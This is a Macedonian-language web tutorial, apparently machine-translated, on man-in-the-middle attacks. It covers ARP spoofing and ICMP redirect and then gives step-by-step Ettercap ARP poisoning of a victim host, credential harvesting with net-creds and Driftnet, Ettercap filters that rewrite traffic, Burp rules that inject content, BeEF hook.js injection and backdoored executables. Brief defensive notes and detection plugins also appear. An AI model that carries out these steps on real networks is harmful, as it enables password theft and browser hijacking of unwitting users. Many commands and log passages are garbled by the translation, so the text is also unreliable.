дома › Инсталација и конфигурација › Хакерите го користат за пренасочување на сообраќајот. Методи на хакерски напади. Измамување податоци со Burp

Хакерите го користат за пренасочување на сообраќајот. Методи на хакерски напади. Измамување податоци со Burp

Методи за пресретнување на мрежниот сообраќај

Слушањето на мрежата со помош на програми за мрежни анализатори е првото, најмногу на едноставен начинследење на податоци.

За заштита од мрежно прислушување, користете специјални програми, на пример, AntiSniff, кои се способни да идентификуваат компјутери на мрежата што слушаат мрежниот сообраќај.

За да ги решат своите проблеми, програмите против шини користат посебен знак за присуство на уреди за слушање на мрежата - мрежната картичка на компјутерот за трагачи мора да биде во посебен режим на слушање. Додека се во режим на слушање, мрежните компјутери реагираат на посебен начин на IP датаграми испратени до домаќинот што се тестира. На пример, домаќините за слушање обично го обработуваат целиот дојдовен сообраќај, а не само датаграмите испратени на адресата на домаќинот. Постојат и други знаци кои укажуваат на сомнително однесување на домаќинот што може да го препознае AntiSniff.

Несомнено, прислушувањето е многу корисно од гледна точка на напаѓачот, бидејќи овозможува да се добијат многу корисни информации - лозинки пренесени преку мрежата, адреси на мрежните компјутери, доверливи податоци, писма итн. Сепак, едноставното прислушување не дозволува хакер да се меша во мрежната комуникација помеѓу два домаќини со цел да ги измени и корумпира податоците. За да се реши таков проблем, потребна е покомплексна технологија.

Ориз. 1 Лажни ARP барања

Ајде да видиме како хакер може да користи ARP за пресретнување на мрежните комуникации помеѓу домаќините А и Б.

За да го пресретне мрежниот сообраќај помеѓу домаќините А и Б, хакерот ја наметнува својата IP адреса на овие хостови, така што А и Б ја користат оваа фалсификувана IP адреса кога разменуваат пораки. За да ја наметне својата IP адреса, хакерот ги извршува следните операции.

Напаѓачот ги одредува MAC адресите на домаќините A и B, на пример, користејќи ја командата nbtstat од пакетот W2RK.
Напаѓачот испраќа пораки до идентификуваните MAC адреси на домаќините А и Б, кои се фалсификувани ARP одговори на барањата за решавање на IP адресите на домаќините до MAC адресите на компјутерите. Домаќинот А е информиран дека IP адресата на домаќинот Б одговара на MAC адресата на компјутерот на напаѓачот; домаќинот Б е информиран дека IP адресата на домаќинот А исто така одговара на MAC адресата на компјутерот на напаѓачот.
Домаќините A и B ги складираат примените MAC адреси во нивните ARP кешови и потоа ги користат за испраќање пораки еден на друг. Бидејќи IP-адресите А и Б одговараат на MAC адресата на компјутерот на напаѓачот, домаќините А и Б, несомнено, комуницираат преку посредник кој може да направи се со нивните пораки.

На мрежите на UNIX, овој тип на измамен напад со барање за ARP може да се имплементира со користење на системски услужни програми за следење и управување со мрежниот сообраќај, на пример, arpredirect. За жал, се чини дека таквите сигурни комунални услуги не се имплементирани на мрежите на Windows. На пример, на веб-страницата NTsecurity можете да ја преземете алатката GrabitAII, претставена како алатка за пренасочување на сообраќајот помеѓу мрежните хостови. Сепак, основната проверка на функционалноста на алатката GrabitAII покажува дека целосниот успех во спроведувањето на неговите функции е сè уште далеку.

За да го пресретне мрежниот сообраќај, напаѓачот може да ја измами вистинската IP адреса на мрежниот рутер со своја IP адреса, правејќи го тоа, на пример, користејќи фалсификувани пораки ICMP Redirect. Домаќинот А мора, според RFC-1122, да ја перцепира добиената порака за пренасочување како одговор на датаграм испратен до друг домаќин, на пример, Б. и ако пренасочувањето на датаграмот е наведено во Пренасочување од А до Б по нова рута, токму тоа ќе го направи домаќинот А.

Ориз. 2 Лажно рутирање

За да изврши лажно рутирање, напаѓачот мора да знае некои детали за организацијата локална мрежа, во кој се наоѓа домаќинот А, особено IP адресата на рутерот преку кој сообраќајот се испраќа од домаќинот А до Б. Знаејќи го ова, напаѓачот ќе генерира IP датаграм во кој IP адресата на испраќачот е дефинирана како IP на рутерот адреса, а примачот е наведен домаќин A. Исто така, вклучена во датаграмот е и пораката ICMP Redirect со полето за адреса на новиот рутер поставено на IP адресата на компјутерот на напаѓачот. Откако ја примил таквата порака, домаќинот А ќе ги испрати сите пораки до IP адресата на компјутерот на напаѓачот.

За да се заштитите од таков напад, треба да ја оневозможите (на пример, користејќи заштитен ѕид) обработката на пораките ICMP Redirect на домаќинот А, а командата tracert (во Unix ова е командата tracerout) може да ја открие IP адресата на компјутерот на напаѓачот . Овие комунални услуги можат да најдат дополнителна рута што се појавила на локалната мрежа што не била предвидена за време на инсталацијата, освен ако, се разбира, мрежниот администратор не е внимателен.

Горенаведените примери на пресретнување (на кои можностите на напаѓачите се далеку од ограничени) нè убедуваат во потребата да се заштитат податоците што се пренесуваат преку мрежата доколку податоците содржат доверливи информации. Единствениот метод за заштита од пресретнување на мрежниот сообраќај е употребата на програми кои имплементираат криптографски алгоритми и протоколи за шифрирање и спречуваат откривање и замена на тајни информации. За да се решат ваквите проблеми, криптографијата обезбедува средства за шифрирање, потпишување и потврдување на автентичноста на пораките пренесени преку безбедни протоколи.

Практична имплементација на сите криптографски методи за заштита на размена на информации е обезбедена од VPN мрежи(Виртуелна приватна мрежа - Виртуелни приватни мрежи).

Пресретнување на TCP конекција

Најсофистицираниот напад за следење на мрежен сообраќај треба да се смета за зафаќање на TCP конекција (TCP киднапирање), кога хакер ја прекинува тековната сесија на комуникација со домаќинот со генерирање и испраќање TCP пакети до нападнатиот домаќин. Следно, користејќи ја способноста на протоколот TCP за враќање на прекината TCP конекција, хакерот ја пресретнува прекинатата комуникациска сесија и ја продолжува наместо исклучениот клиент.

Протоколот TCP (Transmission Control Protocol) е еден од основните транспортни протоколи. Ниво на OSI, овозможувајќи ви да воспоставите логички врски преку виртуелен комуникациски канал. Преку овој канал се пренесуваат и примаат пакети со снимена нивната секвенца, се контролира протокот на пакети, се организира реемитување на искривените пакети и на крајот од сесијата се прекинува каналот за комуникација. TCP е единствениот протокол основен протоколод семејството TCP/IP, кое има напреден систем за идентификација и поврзување на пораки.

Преглед на трагачи на софтверски пакети

Сите софтверски трагачи може да се поделат во две категории: трагачи кои поддржуваат лансирање од командна линија, и душка со графички интерфејс. Сепак, забележуваме дека има трагачи кои ги комбинираат двете од овие способности. Покрај тоа, sniffers се разликуваат едни од други по протоколите што ги поддржуваат, длабочината на анализата на пресретнати пакети, способноста за конфигурирање на филтри и можноста за компатибилност со други програми.

Обично прозорецот на кој било кодош со графички интерфејссе состои од три области. Првиот од нив ги прикажува збирните податоци на пресретнати пакети. Вообичаено, оваа област прикажува минимум полиња, имено: време на пресретнување на пакети; IP адреси на испраќачот и примачот на пакетите; MAC адреси на испраќачот и примачот на пакетот, адресите на изворната и одредишната порта; тип на протокол (мрежен, транспортен или апликативен слој); некои збирни информации за прислушуваните податоци. Втората област прикажува статистички информации за поединечниот избран пакет, а на крајот третата област го прикажува пакетот во хексадецимална или ASCII форма на знаци.

Речиси сите трагачи на пакети ви дозволуваат да анализирате декодирани пакети (затоа и трагачите на пакети се нарекуваат и анализатори на пакети, или анализатори на протокол). Трагачот дистрибуира пресретнати пакети низ слоеви и протоколи. Некои трагачи на пакети се способни да го препознаат протоколот и да ги прикажат заробените информации. Овој тип на информации обично се прикажува во втората област на прозорецот за трагачи. На пример, секој трагач може да го препознае протоколот TCP, а напредните трагачи можат да одредат која апликација го генерира овој сообраќај. Повеќето протоколи анализатори препознаваат преку 500 различни протоколи и можат да ги опишат и декодираат по име. Колку повеќе информации трагачот може да декодира и прикажува на екранот, толку помалку ќе мора да се декодира рачно.

Еден проблем со кој може да се сретнат трагачите на пакети е неможноста правилно да се идентификува протокол користејќи порта различна од стандардната порта. На пример, за да се подобри безбедноста, некои добро познати апликации може да се конфигурираат да користат порти различни од стандардните порти. Значи, наместо традиционалната порта 80 резервирана за веб-серверот, овој серверМожете насилно да го реконфигурирате на порта 8088 или која било друга. Некои анализатори на пакети во оваа ситуација не се во можност правилно да го одредат протоколот и да прикажуваат само информации за протоколот од пониско ниво (TCP или UDP).

Постојат софтверски трагачи кои доаѓаат со софтверски аналитички модули како приклучоци или вградени модули кои ви дозволуваат да креирате извештаи со корисни аналитички информации за пресретнатиот сообраќај.

Друга карактеристична карактеристика на повеќето анализатори на софтверски пакети е способноста да се конфигурираат филтри пред и по снимањето на сообраќајот. Филтри избираат одредени пакети од општиот сообраќај според даден критериум, што ви овозможува да се ослободите од непотребните информации кога го анализирате сообраќајот.

Алтернативи на Ettercap

Ettercap е најпопуларниот софтвер за напад човек во средината, но дали е најдобар? Во текот на целата инструкција, ќе видите дека Ettercap речиси никогаш не се користи сам, дека една или друга програма секогаш е изградена со неа во синџирот за обработка на сообраќајот. Можеби ова додава флексибилност; генерално, овој пристап е основата на UNIX - една програма извршува една задача, а крајниот корисник комбинира различни програми за да го постигне посакуваниот резултат. Со овој пристап, програмскиот код е полесен за одржување; од такви минијатурни „тули“ можете да изградите систем со секаква сложеност и флексибилност. Сепак, да се има пет отворени конзоли со различни задачи, чија работа е насочена кон постигнување на еден единствен резултат, не е многу погодно, едноставно е покомплицирано, постои можност да се направи грешка во некоја фаза, а целата конфигурирана системот ќе работи залудно.

Net-Creds шмркаат:

Посетени URL-адреси
Испратени се барањата за POST
најавувања/лозинки од HTTP форми
најавувања/лозинки за основна автентикација на HTTP
Пребарувања на HTTP
FTP најавувања/лозинки
IRC најавувања/лозинки
POP најавувања/лозинки
IMAP најавувања/лозинки
Телнет најавувања/лозинки
SMTP најавувања/лозинки
Низа на заедницата SNMP
сите поддржани протоколи NTLMv1/v2 како HTTP, SMB, LDAP, итн.
Керберос

Добар избор на пресретнати, а Driftnet е поедноставна во овој поглед - прикажува само пресретнати слики.

Префрлете ја машината во режим на препраќање.

Ехо „1“ > /proc/sys/net/ipv4/ip_forward

Стартувајте го Ettercap со графички интерфејс (-G):

Етеркап-Г

Сега изберете Hosts, има под-точка Скенирај за домаќини. Откако ќе заврши скенирањето, изберете Листа на домаќини:

Како Target1, изберете го рутерот (Add to Target 1), како Target2 изберете го уредот што ќе го нападнете (Add to Target 2).

Но, тука може да се појави првиот проблем, особено ако има многу домаќини. Во различни инструкции, вклучително и во видеото презентирано погоре, авторите се качуваат во целната машина (сите, поради некоја причина, имаат Windows) и со помош на командата ја гледаат IP адресата на оваа машина на локалната мрежа. Се согласувам, оваа опција е неприфатлива за реални услови.

Ако скенирате користејќи , можете да добиете некои Дополнителни информацииза хостовите, поточно, за производителот на мрежната картичка:

Nmap -sn 192.168.1.0/24

Ако податоците сè уште не се доволни, тогаш можете да направите скенирање за да го одредите оперативниот систем:

Nmap -O 192.168.1.0/24

Како што можеме да видиме, машината со IP 192.168.1.33 се покажа дека е Windows, ако ова не е знак одозгора, тогаш што е тоа? 😉 LOL

Ова го додаваме како втор гол.

Сега одете во ставката од менито Mitm. Таму, изберете ARP poisoning... Проверете го полето за далечински врски Sniff.

Почнуваме да бериме, во еден прозорец лансираме

Нето-кредити

во друга (двете програми може да се извршуваат без опции)

Дрифтмрежа

Собирањето податоци започна веднаш:

На десната страна, Driftnet отвори уште еден прозорец во кој ги прикажува пресретнатите слики. Во прозорецот net-creds гледаме посетени страници и пресретнати лозинки:

1.2 Ettercap + Burp Suite
3. Приказ на податоци (посетени страници и снимени лозинки) во Ettercap

Во менито Поглед имаме пристап до табовите Врски и Профили. Можете исто така да го штиклирате полето Решавање на IP адреси. Врските се, се разбира, врски. Ettercap собира профили во меморија за секој домаќин што ќе го открие. Таму се собираат корисници и лозинки. Во овој случај, профилите со заробени податоци за сметката (лозинки) се означени со крст:

Нема потреба премногу да се потпирате на профилите - на пример, означени се пресретнати најавувања и лозинки за FTP и други услуги, за кои програмата може јасно да ги толкува добиените информации како ингеренции. Ова не вклучува, на пример, основни податоци за автентикација, најавувања и лозинки внесени во веб-обрасци.

Во Connections, најперспективните податоци се означени со ѕвездичка:

Можете да кликнете двапати на овие записи за да ги видите деталите:

За да не ги барате овие ѕвезди низ списокот, можете да ги сортирате по ова поле и сите тие ќе се појават на врвот или на дното:

Фатена основна автентикација:

Лозинка за најава за Yandex (означена подолу):

Ова се пресретнати акредитиви за VKontakte:

Исто така, најинтересните податоци се собрани во долната конзола:

Ако сакате да ги зачувате резултатите од програмата, тогаш користете ги овие опции (наведете ги копчињата при стартување на Ettercap:

Опции за евидентирање: -w, --напишете запишете заробени податоци во pcapfile -L, --log запишете го целиот сообраќај на ова -l, --log-info пишувајте само пасивни информации на ова -m, --log-msg пишувајте ги сите пораки во овој -c, --compress користете gzip компресија за лог датотеки

4. Замена на податоци при летот во Ettercap
4.1 Користење Ettercap прилагодени филтри

Забелешка: И покрај сите тестирања, филтрите Ettercap сè уште не работеа кај мене. Тешко е да се разбере дали се работи за раце, хардверски карактеристики или грешка во самата програма... Но, за верзијата 0.8.2 (најновата во моментов), има извештај за грешки за проблеми со филтрите. Генерално, судејќи според извештаите за грешки и форумите, филтрите или често паѓаат или воопшто не работат долго време. Има гранка каде се направени промени пред 5 месеци https://github.com/Ettercap/ettercap/tree/filter-improvements, т.е. филтер-подобрувања (со подобрувања на филтерот). И за оваа гранка и за верзијата од складиштето, беа направени широк спектар на тестови, беа тестирани различни филтри под различни услови, беше потрошено многу време, но немаше резултат. Патем, за да ја инсталирате верзијата за подобрувања на филтерот во Kali Linux, треба да го направите ова:

Судо apt-get отстрани ettercap-графички ettercap-заеднички sudo apt-get инсталира git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurl5 libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git клон -b филтер-подобрувања https://github.com/Ettercap/ettercap.git cd ettercap/ mkdirLEABCSaFbuildd =Вклучено ../ направи sudo направи инсталира

Во принцип, ако вашите филтри не работат, тогаш не сте сами. Во упатствата за Ettercap, не можам да ја прескокнам темата за филтри, така што тие ќе бидат дискутирани во секој случај.

Досега го користевме Ettercap за ARP измама. Ова е многу површна апликација. Благодарение на сопствените филтри, можеме да интервенираме и да го менуваме сообраќајот во лет. Филтрите мора да бидат содржани во посебни датотеки и мора да се компајлираат со помош на програмата Etterfilter пред употреба. Иако документацијата на која е дадена врската изгледа скудна, но заедно со примерите дадени подолу, ќе ви овозможи да напишете доста интересни филтри.

Ајде да го создадеме нашиот прв филтер, тој ќе ги замени сите слики со ова:

Во датотека со име img_replacer.filter копирајте:

Ако (ip.proto == TCP && tcp.dst == 80) ( if (пребарување(DATA.data, "Accept-Encoding")) (замени ("Accept-Encoding", "Accept-Rubbish!"); # забелешка: стрингот за замена е иста должина како и оригиналната msg("зафатено Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) (замени("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); замени("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png \" "); замени ("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); замени ("SRC =", "src= \" http://www.irongeek.com/images/jollypwn.png\" ");

Компилирајте ја датотеката:

Etterfilter img_replacer.filter -o img_replacer.ef

Резултати од компилацијата:

Etterfilter 0.8.2 авторски права 2001-2015 Ettercap Развојен тим 14 табели на протокол се вчитани: ДЕКОДИРАНИ ПОДАТОЦИ udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth вчитани 13 константи: VRRP OSPF GRE UDPTPMP6 IPPOCPMP GRE UDPMP6 датотека „img_replacer.filter“ е завршено. Завршено е расплетувањето на мета-дрвото. Извршено е конвертирање на етикети во вистински поместувања. Завршено е запишување на излезот во „img_replacer.ef“. -> Скрипта кодирана во 18 инструкции.

Прекинувачот -F и кажува на програмата да го вчита филтерот од датотеката што следи по прекинувачот. По компилацијата, името на нашата нова датотека со филтерот е img_replacer.ef, така што командата ја има формата:

Ettercap -G -F img_replacer.ef

Забелешка: Кога го следите веб сообраќајот, пакетите што ги гледате може да се во шифрирана форма. За ефикасна работафилтри, на Ettercap му треба сообраќај во формата обичен текст. Според некои набљудувања, типот на кодирање што го користат веб-страниците е „Прифати-енкодирање: gzip, deflate“

Подолу е филтер што го препишува кодирањето, принудувајќи ја комуникацијата во форма на обичен текст:

If (ip.proto == TCP && tcp.dst == 80) ( if (пребарување(DATA.data, "gzip")) (замени ("gzip", " "); # забелешка: четири празни места во заменетиот стринг msg („избришан gzip\n“); ) ) ако (ip.proto == TCP && tcp.dst == 80) ( ако (пребарување(DATA.data, „deflate“)) (замени („deflate“, " "); # забелешка: седум празни места во заменетиот ред msg("whited out deflate\n"); ) )

Синтаксата за пишување филтри е детално опишана, а потоа има уште неколку примери:

# замена на текст во пакет: ако (ip.proto == TCP && пребарување (DATA.data, "lol")) (замени ("lol", "smh"); msg ("филтерот истрча"); ) # покаже порака , ако портата tcp е 22 ако (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH пакет\n"); ) ) # запишете целиот телнет сообраќај, исто така, изврши ./програма за секој пакет if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./ logfile.log "); exec("./program"); ) ) # евидентирај го целиот сообраќај освен http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) (log (DATA.data , "./logfile.log"); ) # некои операции на товарот на пакетот ако (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) друго ( DATA.data = " изменето"; DATA .data + 20 = 0x4445; ) # испушти ги сите пакети што содржат „ettercap“ if (пребарување(DECODED.data, „ettercap“)) ( msg(„некој зборува за нас...\n“) ; drop( ); kill(); ) # рекорд дешифрирани ssh пакети што одговараат на регуларниот израз if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # убивачки пакети ако (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Замена на податоци со помош на Burp

Ги лансираме Ettercap и Burp како што е опишано во став 1.2 или во став 2.2.

Во Burp, одете до Proxy -> Options. Таму наоѓаме Match и Replace. Кликнете Додај за да додадете ново правило.

Заглавието на барањето е заглавието на барањето
Тело за барање - тело за барање
Заглавие на одговор - заглавие на одговор
Тело за одговор - тело за одговор
Барај име на параметар - Барај име на параметар
Барање вредност на параметарот - Барање вредност на параметарот
Барање прва линија - Прва линија на барањето

Ако треба да ги промените податоците што се пренесуваат со методот GET, тогаш ова се однесува на заглавијата.

Во ознаката HTML постои и такво нешто како глава (ознака за глава). Тие што се споменати само погоре немаат никаква врска со овој наслов. Малку повисоко зборуваме за заглавија на пакети. Ако сакате да ја промените содржината HTML страници, тогаш секогаш треба да изберете Тело за одговор наместо заглавие Барај, дури и ако сакате да ја промените содржината на ознаката за глава (на пример, насловот).

Ако не сте запознаени со регуларни изрази, тогаш, во принцип, нема што да се грижите: HTML простува многу, а она што не го разбира, едноставно го игнорира - можете да го користите. Ако знаете да користите регуларни изрази, тогаш ве почитувам.)))

На пример, ајде да создадеме ново правило, менувајќи го заглавието на Барање во Тело за одговор. Во самото правило ќе се смениме

Без наслов

Проверете го полето за совпаѓање Regex.

Сега на сите сајтови (без HTTPS) насловот ќе биде No Title:

Вметнете произволна линија по ознаката за тело (тоа ќе биде првата линија во текстот). Заглавието на барањето се менува во Тело за одговор. Се менуваме

Проверете го полето за совпаѓање Regex.

Во горниот десен агол (во зависност од изгледот) се појавува натписот „Јас сум кул!“. Можете да вметнете CSS, JavaScript код, кој било текст - било што. Генерално можете да отстраните сè од страницата, а потоа да ја пополните со своја содржина - се зависи од вашата имагинација.

Идејата беше малку да се измени секој формулар, така што податоците ќе бидат испратени до оригиналниот сервер и до серверот на напаѓачот (да се имплементира повеќекратно поднесување за секоја форма). Но, со образложение дека ако пренесените податоци не се шифрирани и имаме пристап до нив, тогаш веќе ги гледаме, нема потреба да ги испраќаме на кој било сервер. Меѓутоа, ако некому му треба навистина работен пример за испраќање податоци од една форма на неколку сервери одеднаш.

5. Поврзување на BeEF

За да започнеме да ги користиме можностите на BeEF, треба да вградиме датотека JavaScript во HTML кодот, обично линија како:

Следните два методи се разликуваат само во начинот на вградување на оваа низа.

5.1 Поврзување на BeEF со помош на филтрите Ettercap

[делот ќе се подготви подоцна]

5.2 Поврзување на BeEF со Burp

Треба да започнете точно како што е напишано во став 4.2. Само наместо да ги заменуваме заглавјата и да додаваме текст на страницата, ќе имплементираме JavaScript код во форма на линија:

Во мојот случај, оваа датотека е достапна на IP 192.168.1.36 на портата 3000. Датотеката се нарекува hook.js (може да се промени во поставките). Оние. во мојот случај треба да ја инјектирам линијата:

Ова може да се направи, на пример, со креирање на ново правило, менување на заглавјето на барање во тело за одговор. Замената мора да се случи во самиот HTML код

Одлично, кога отворате веб-локација што нема HTTPS, JavaScript кодот се вметнува во HTML-кодот, кој ви овозможува да собирате информации преку закачен прелистувач и да извршите разни напади:

6. Инфекција со задни врати

Можете да ги замените и заразите извршните датотеки користејќи ги двата филтри Ettercap [кои поради некоја причина повеќе не работат] и користејќи апликации од трета страна. На пример, BDFProxy може да го направи ова во лет. За жал, BDFProxy сè уште се опоравува од ажурирањето на Backdoor Factory од април 2016 година: пакетот libmproxy беше преименуван во mitmproxy во Python. За BDFProxy, пакетот libmproxy е неопходна зависност; без овој пакет програмата нема да започне. Затоа, сега, пред „поправката“ на BDFProxy, невозможно е да се користи, бидејќи дури и со инсталирана Backdoor Factory, програмата BDFProxy се жали на отсуството на библиотеката libmproxy...

Слична операција може да се направи со Burp Suite. Прикажан е алгоритмот чекор-по-чекор; нема смисла да се преработи повторно во овој дел.

7. Користење на Ettercap приклучоци

Може да се најдат информации за приклучоците Ettercap. Има доста приклучоци; оние опишани подолу ми изгледаат најинтересни.

Приклучоците може да се поврзат кога ќе се стартува Ettercap, постои опција за ова:

P, --приклучокот стартувајте го ова

Приклучоците може да се вчитаат и од GUI:

[МАТЕРИЈАЛОТ ВО ПОДГОТОВКА]

7.1 arp_cop

Пријавува сомнителна активност на ARP со пасивно следење на барањата/одговорите на ARP. Може да пријави обиди за труење со ARP или едноставни конфликти на IP или промени на IP. Ако градите првична листа на домаќини, приклучокот ќе работи попрецизно.

Ettercap -TQP arp_cop //

Пример за вистинско откривање на ARP измама:

Прошири

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // лозинка за mial: ettercap 0.8.2 авторски права 2001-2015 Ettercap Развојен тим Слушање на: eth0 -> 08:00:27:A3:08:4A 19.2. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 Дисекцијата на SSL бара валидна скрипта „redir_command_on“ во датотеката etter.conf Привилегиите паднаа на EUID 65534 EGID 65534... 33 monitored protocol7 порти050 отпечаток од продавач 1766 tcp ОС отпечаток од прст 2182 познати услуги По случаен избор на 255 хостови за скенирање... Скенирање на целата мрежна маска за 255 хостови... * |====== ============== =============================>| 100,00 % Додадени се 3 домаќини во списокот на хостови... Започнува унифицирано душкање... Активиран е само текст... Интерфејсот е активиран... Притиснете „h“ за помош во линија. ) 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.35 се преправа дека е 192.168.1.35 ar.168.1.1.1 s да биде 192.168.1.1 arp_cop: ( ПРЕДУПРЕДУВАЊЕ ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 191.381p. : (WA RNING) 192.168.1.35 се преправа дека биди 192.168 .1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.35 се преправа дека е 192.168.1.1.3 се преправа дека е 192.168.1.1.1 да биде 192.1 68.1.1 arp_cop: ( ПРЕДУПРЕДУВАЊЕ) 192.168 .1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.151p. : (ПРЕДУПРЕДУВАЊЕ) 192.1 68.1.35 се преправа биди 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.35 се преправа дека е 192.168.1.1.35 се преправа дека е 192.168.1.1.35. да биде 192.168.1. 1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.151p. : (ПРЕДУПРЕДУВАЊЕ) 192.168.1.3 5 се преправа да биде 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.35 се преправа дека е 192.168.1.35 ar.168.1.1.1 s да биде 192.168.1.1 arp_cop : ( ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1. arp.1.1. (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192. 168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1.1 arp_cop.1.1 се преправа дека е 192.168.1.1. 2.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.168.1p1.35 NING ) 192.168.1.35 се преправа дека е 192.168 1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop. 16 8.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168. 1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.35 се преправа дека е 192.168.1.1 arp_cop: (ПРЕДУПРЕДУВАЊЕ) 192.168.1.1.1. ИНГ) 192.16 8.1.35 се преправа дека е 192.168 .1.1.................................

7.2 автоматско додавање

Тој автоматски ќе додаде нови жртви додека се поврзуваат со нападот со труење со ARP. Бара ARP барања на локалната мрежа и доколку се открие, приклучокот ќе го додаде домаќинот на списокот на жртви ако списокот е наведен како TARGET. Домаќинот се додава кога барањето arp е видливо од него.

7,3 чк_отров

Проверува дали модулите arp etch во ettercap се успешни. Испраќа лажни ICMP ехо пакети до сите жртви на мамка додека се преправа дека е секоја жртва. Може да фати ICMP одговор со нашата MAC адреса како дестинација, што значи дека мамката помеѓу двете цели е успешна. Ги проверува двете патеки на секоја врска.

7,4 dns_spoof

Овој приклучок ги прекинува барањата за DNS и одговара со лажен (лажен) одговор. Можете да изберете на која адреса треба да одговори приклучокот со уредување на датотеката etter.dns. Приклучокот ги пресретнува барањата A, AAAA, PTR, MX, WINS, SRV и TXT. Ако тоа беше барање A, тогаш името се бара во датотеката и се враќа IP адресата (можете да користите џокери во името).

Истото важи и за барањата АААА.

7.5 find_conn

Многу едноставен приклучок кој слуша за ARP барања за да ви ги покаже сите цели со кои домаќинот сака да комуницира. Исто така, може да ви помогне да најдете адреси на непознати LAN мрежи.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Се обидува да идентификува ettercap пакети испратени до LAN. Може да биде корисно при идентификување на некој што се обидува да користи ettercap. Не се потпирајте на тоа 100% бидејќи тестовите работат само на одредени секвенци/бројови за идентификација.

7.7 scan_poisoner

